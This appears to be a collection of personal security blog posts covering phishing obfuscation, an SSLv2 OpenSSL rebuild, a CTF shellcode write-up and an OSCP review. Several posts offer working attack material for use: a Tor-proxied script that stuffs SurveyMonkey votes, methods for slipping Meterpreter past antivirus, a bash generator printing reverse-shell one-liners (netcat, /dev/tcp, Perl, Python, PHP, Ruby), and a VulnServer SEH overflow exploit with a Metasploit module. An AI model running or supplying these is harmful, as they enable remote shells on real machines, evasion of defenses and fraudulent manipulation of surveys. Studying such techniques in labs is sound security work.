Novel Phishing Methods

Most spam email you get is very poorly executed and relativly easy to spot, but some are well crafted.

For example would you click on hxxp://paypal.com-gb.org/home ?

It’s not immediately obvious that the domain name is com-gb.org.

Upon visiting the phishing page it makes use of AES 256 to decrypt the phishing page content. Making it very hard to do static anaysis to determine if the site is a phishing website. This is done by dercypting the page and then writing it out with document.write(). Below is an example from http://www.movable-type.co.uk/scripts/aes.html which is being used by the phishing page.

<!DOCTYPE html>
<head>
<script src='https://raw.githubusercontent.com/chrisveness/crypto/master/aes.js'></script>
<script src='https://raw.githubusercontent.com/chrisveness/crypto/master/aes-ctr.js'></script>
<script>
var password = 'L0ck it up saf3';
var plaintext = '<h1>awww yeaaah</h1>';
var ciphertext = Aes.Ctr.encrypt(plaintext, password, 256);
alert(ciphertext);
var origtext = Aes.Ctr.decrypt(ciphertext, password, 256);
document.write(origtext)
</script>
</head></html>

The phishing page looks like :

<script src='base/js/hea2.js'></script> // AES Libary
<script>
var hea2p = 
('0123456789ABCDEFGHIJKLMNOPQRSTUVXYZabcdefghijklmnopqrstuvxyz'); //This is the password, not sure why it's a charset..
var hea2t = 'fwH2rmnTLlRpex'; // This has been snipped because it's long
var output = Aes.Ctr.decrypt(hea2t, hea2p, 256);
document.write(output)
</script>

Here is a fiddle of the actual phishing page http://jsfiddle.net/4550gq9p/

openssl-1.0.1f on Ubuntu 14.04 x64 with SSLv2 enabled

Pre-requisits Packages

sudo apt-get install libssl-dev devscripts dpkg-dev cdbs debhelper dh-autoreconf libev-dev libpcre3-dev pkg-config -y

 

OpenSSL openssl-1.0.1f Patching

Now openssl in ubunutu is compiled without sslv2 because it’s insecure (don’t install openssl like this on a production server), but some security tools use openssl to do cipher checks such as SSLSCAN which needs it enabled in order to check for the insecure ssl version. In order to enable sslv2 the package needs to be needs to be re-configued without the nossl flag. First let’s grab the source.

apt-get source openssl

Now you have a load of files in your directory, your going to want to cd to the openssl-1.0.1f directory have contains the source code and compile script.
Next we need to edit the file in debain/rules. Remove the “no-ssl2” so it looks like the line commented below.

cd openssl-1.0.1f
nano debian/rules
#CONFARGS  = --prefix=/usr --openssldir=/usr/lib/ssl --libdir=lib/$(DEB_HOST_MULTIARCH) no-idea no-mdc2 no-rc5 no-zlib  enable-tlsext $(ARCH_CONFARGS)

Next we will add a comment and commit the change. Then re-build the package, this is going to take some time so skip down to the nmap part and download the source.
You might get some error says copyright was unable to be verified, ignore it.

dch –n 'Allow SSLv2'
dpkg-source --commit
debuild -uc -us

Now cd .. and ls and you will see all the deb packages built.
To install all of them use dpkg -i *ssl*.deb

cd ..
dpkg -i *ssl*.deb

Now let’s test out openssl!

openssl s_client -connect www.somewebiste.blah:443 -ssl2

You will get unknown hostname instead of unknown argument which means openssl is working.

Ref : http://blog.opensecurityresearch.com/2013/05/fixing-sslv2-support-in-kali-linux.html

Survey Monkey has no captcha, beware

As Survey Monkey is used for surveys you want to have real results.

This post will show how easily it would be to vote fraudulently and manipulate poll results.

For this example I will be using python with it’s mechanize module and Tor installed on Linux. You will also need Firefox with the TamperData plugin.

Firstly I have created a test Survey.

Capture

Next I will find out the post data using TamperData.

gettingdataPNG

The important data has been highlighed. The input name on the left is the name of the form element for the What is my name and the number corresponding to it on the far right is the answer I picked “billy”. The rest of the post data is hidden feilds and tokens to identify the response.

With this information it’s easy  to put together a script to automate the submission of the survey. Below is the commented code for the example submission.

http://pastebay.net/1203480

#!/usr/bin/env python
#SurveyMonkey needs captcha
import mechanize
import socks
import socket
#patch to use tor, code from stackcoverflow not mine
def create_connection(address, timeout=None, source_address=None):
    sock = socks.socksocket()
    sock.connect(address)
    return sock

socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
socket.socket = socks.socksocket
socket.create_connection = create_connection
count = 0
while True:
    br = mechanize.Browser()# Open the broswer object
    br.addheaders = [('User-agent', ' Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31')]
    br.open('http://www.surveymonkey.com/s/AAAAA') # survey to test
    br.select_form(nr=0)
    #What is my name?
    br.form.set_value(['6024902055_0'],name='input_518253276_10_0_0')
    #Drop down you say selection c
    br.form.set_value(['6024902970'],name='input_518253330_50_6024902966_6024902967')
    #Tell me about yourself
    text = "testing 123" # text for the form
    br.form.set_value(text,name='text_518253292_0')
    br.submit()#submit the form
    br.response().read()#print the response
    print br.response().read()
    count+=1
    print "Number of votes: "+ str(count) # print number of votes

The script worked as expected and billy was the most popular name.
fakevotes

3u4xj5

Solving Bsides 2013 Challenge 1

The challenge was to get a password from the excel document.

If you looked inside the Macro for the excel document you could see it was running shellcode.

So i edited the macro to write the shellcode to a file before it was run.


Private Sub ExecuteShellCode()
Dim lpMemory As Long
Dim sShellCode As String
Dim lResult As Long

sShellCode = ShellCode()
Open "C:\shellcode" For Output As #1
Write #1, ShellCode()
Close #1
lpMemory = VirtualAlloc(0&, Len(sShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
lResult = WriteProcessMemory(-1&, lpMemory, sShellCode, Len(sShellCode), 0&)
lResult = CreateThread(0&, 0&, lpMemory, 0&, 0&, 0&)
End Sub

After opening the file it has some shellcode that decodes and runs the exe thats base 64 encoded.

meh

So I just run the Shellcode using C. As the shellocode was super long windows didn’t like it so I used GCC.


#include <stdio.h>

char shellcode[] = "\xeb\x3a\x31\xd2\x80\x3b\x2b\x75\x04\xb2\x3e\xeb\x26\x80\x3b\x2f\x75\x04\xb2\x3f\xeb\x1d\x80\x3b\x39\x77\x07\x8a\x13\x80\xea\xfc\xeb\x11\x80\x3b\x5a\x77\x07\x8a\x13\x80\xea\x41\xeb\x05\x8a\x13\x80\xea\x47\xc1\xe0\x06\x08\xd0\x43\xc3\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x31\xc9\x80\xc1\x36\x01\xcb\x89\xd9\x31\xc0\x80\x3b\x3d\x74\x25\xe8\xab\xff\xff\xff\xe8\xa6\xff\xff\xff\xe8\xa1\xff\xff\xff\xe8\x9c\xff\xff\xff\x86\xc4\xc1\xc0\x10\x86\xc4\xc1\xc8\x08\x89\x01\x83\xc1\x03\xeb\xd4"

"6FoIAADDVYnlUVZXi00Mi3UQi30U/ +9999 lines of base64 encoded lines.

A=";

int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) shellcode;
(int)(*func)();
}

I then loaded it into olly and stepped through the program and kept an eye on what chars were in the registers. Until I saw “ExcelMagic” in a ECX which was being compared to my input.

gameover

Anti-Virus Evasion for Meterpreter

Anti-Virus companies are smart and can pick up all the encoders used in Metasploit. After doing some research I found three different ways  run Meterpreter shellcode which work.

1. Run shellcode using dot net  https://github.com/mandreko/DotNetAVBypass/

It does require .net framework 4.

 

2. Run shellcode using python after using pyinstaller to build the python as an executable.

The executable it creates is quite big 3mb.

http://pastebin.com/raw.php?i=rrhcGeHh

The third method which is from

http://www.coresec.org/2011/11/09/fud-payload-generator-for-backtrack/

This generates an executable but uses the  mingw32msvc-gcc compiler which is not very widely used so not detected as much by antivirus companies.

 

Hacking-lab.com VPN connect for Kali,Backtrack [bash]

hacking-labs.com has some really awesome challenges which I am working my way through.

Register  https://www.hacking-lab.com/user/register/ if you have not done so.

The connect script on the site was pretty good but i decided to make a more portable version that checks if the config files exist then if not it downloads all the config files. Runs openVPN in a new window. Then launches the event page as the website page with all the challenges. Forks a new process so that the resolv.conf will keep on being copied then on key press the child process is killed and the old config replaced.

#!/bin/bash
echo "$(tput setaf 2)Welcome to Hacking labs btr5 connect script by dwinfrey v1.1"
if ([[ -a resolv.conf.hacking-lab ]] && [[ -a client.ovpn ]] && [[ -a hlca.crt ]])
then
echo "All config files exist"
else
echo "$(tput setaf 1)Error, config files missing, Downloading config files"
wget http://media.hacking-lab.com/largefiles/livecd/z_openvpn_config/backtrack/resolv.conf.hacking-lab
wget http://media.hacking-lab.com/largefiles/livecd/z_openvpn_config/backtrack/client.ovpn
wget http://media.hacking-lab.com/largefiles/livecd/z_openvpn_config/backtrack/hlca.crt
fi
echo "$(tput setaf 2)OpenVPN connection window will open"
echo "Login using your email/password"
gnome-terminal -x openvpn client.ovpn
read -p "Press Enter when successfully connected"
mv /etc/resolv.conf /etc/resolve.conf.back
cp resolv.conf.hacking-lab /etc/resolv.conf
echo "Your resolve.conf has been backed up and new config copied"
echo "Opening Events page"
firefox https://www.hacking-lab.com/events/ &
keep_copying(){

while [ 0 ]; do
	cp resolv.conf.hacking-lab /etc/resolv.conf
	sleep 60
done
}
keep_copying & pid_copy=$!
read -p "Press any enter when you wish to disconnect"
killall openvpn
kill $pid_copy
mv /etc/resolve.conf.back /etc/resolve.conf
echo "Resolv.conf restored, Goodbye"

Reverse shell One-liners all in one bash script

This small script uses the reverse shells from : http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

The script will print out all the different one liners for reverse shells using different programming languages.  If no port number is given, it will default to 443.


#!/bin/bash
# v1 one-liner-reverse-shells
# One liners source http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
IP=$1 # assigning variables
PORT=$2

# Validating input
if [ $# -eq 1 ]; then
PORT=443 # set Default port
elif [ $# -gt 2 -o $# -lt 1 ]; then
echo -e "Usage: $0 IP PORT, If no port is given default is set to 443"
exit 1
fi

echo "$(tput setaf 1)Netcat Listener: nc -lvp $PORT"
echo "Netcat : nc -e /bin/sh $IP $PORT"
echo $'\n'$(tput setaf 4)
echo 'Perl: perl -e '\''use Socket;$i="'$IP'";$p='$PORT';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'\'''
echo $'\n'$(tput setaf 2)
echo 'Python: python -c '\''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("'$IP'",'$PORT'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'\'''
echo $'\n'$(tput setaf 4)
echo 'PHP: php -r '\''$sock=fsockopen("'$IP'",'$PORT');exec("/bin/sh -i <&3 >&3 2>&3");'\'''
echo $'\n'$(tput setaf 1)
echo 'Ruby: ruby -rsocket -e'\''f=TCPSocket.open("'$IP'",'$PORT').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'\'''
echo $'\n'$(tput setaf 7)
echo 'Bash: bash -i >& /dev/tcp/'$IP'/'$PORT' 0>&1'

Comments and suggestions welcome 🙂

 

 

Penetration Testing with BackTrack review / OSCP

I really enjoyed the course. The labs have 50 computers, each with a different ways in. The main reason for choosing Penetrating with backtrack over CEH is that CEH is all theory and they can get really boring and I learn much better by doing than reading a text book and watching a few videos.

The course is also good because it gives you around 40% of the material and then the other 60% is all down to you to research and find out. This may seem like a bad point but really it’s the courses big benefit because it makes you do your own research and solve the problems by yourself.

I managed to get into 46 of 50 lab machines which I was pleased about. The course has also given me confidence to not be afraid of failing…you get used to failing the in the labs and you just have to keep trying.
I made the error of downloading and running an exploit without using my own shellcode which rm’d my hard drive..goodbye lab notes. So I had to restart from nothing again after 30days. This was in some ways good as it meant I had a re-fresher on all modules. After that I decided to keep all my notes inside windows using keepnote a backup of my VM daily.

My favourite part of the course was the exam, 24hrs of pressured hacking, I managed to get 2hrs sleep, eat three pizzas and pass the exam. I cannot go into any detail about the exam apart from you will enjoy it if you enjoyed the labs 😀

Porting VunServer “GMON /” SEH exploit to Metasploit

Pre-requisites :  http://resources.infosecinstitute.com/seh-exploit/
Coerelan template : http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-1-%E2%80%94-introduction/

Re-freshers of the SEH exploit

Now onto the python code 🙂

import sys
import struct
import socket

shellcode=("\xCC\xCC\xCC") #use your own Shellcode bad chars \x00\x0A\x0D
sehp = "\xEB\x0F\x90\x90"; # JMP 0F(15), NOP, NOP (POINTER TO NEXT SEH RECORD)
seho = struct.pack(' longjump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF" # JMP back 768 bytes
buffer= "\x90" * 2752 + "\x90" * 32 + shellcode + "\x90" * (714 - len(shellcode)) + sehp + seho + longjump + "D" *480
#makenops 2752 + 32 = 2784
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1',9999))
data=s.recv(1024)
s.send('GMON /' + buffer)
s.close()

This makes the metasploit exploit

# Metasploit template from corelan.be
# SEH for vunserver thegreycorner.com
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote # A remote exploit

include Msf::Exploit::Remote::Tcp # using TCP connection

def initialize(info = {})
super(update_info(info,
'Name' => 'Vunserver SEH exploit',
'Description' => %q{
This module exploits an SEH exploit in
vulnserver.
},
'Author' => [ 'Stephen Bradshaw','Duncan Winfrey' ],
'Version' => '$Revision: 9999 $',
'References' =>
[
[ 'Vunserver', 'http://www.thegreycorner.com/p/vulnserver.html' ],
[ 'corelan.be', 'http://tinyurl.com/64s3je4' ],
],

'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',

'Targets' =>
[
['Windows NT/2000/XP/2003 ',
{ 'Ret' => 0x625010b4,} ],
],
'DefaultTarget' => 0,

'Privileged' => false
))

register_options(
[
Opt::RPORT(9999)
], self.class)
end

def exploit
connect

request = 'GMON /'
request << rand_text_alpha_upper(2752)
request << make_nops(32)
request << payload.encoded
request << rand_text_alpha_upper((714 - payload.encoded.length))
request << "\xEB\x0F\x90\x90" # Short Jump
request << [target.ret].pack('V') # SEH Overwrite
request << "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF" # go back 768 bytes
request << rand_text_alpha_upper(480) # junk

sock.put(request)

handler
disconnect

end

The working module 🙂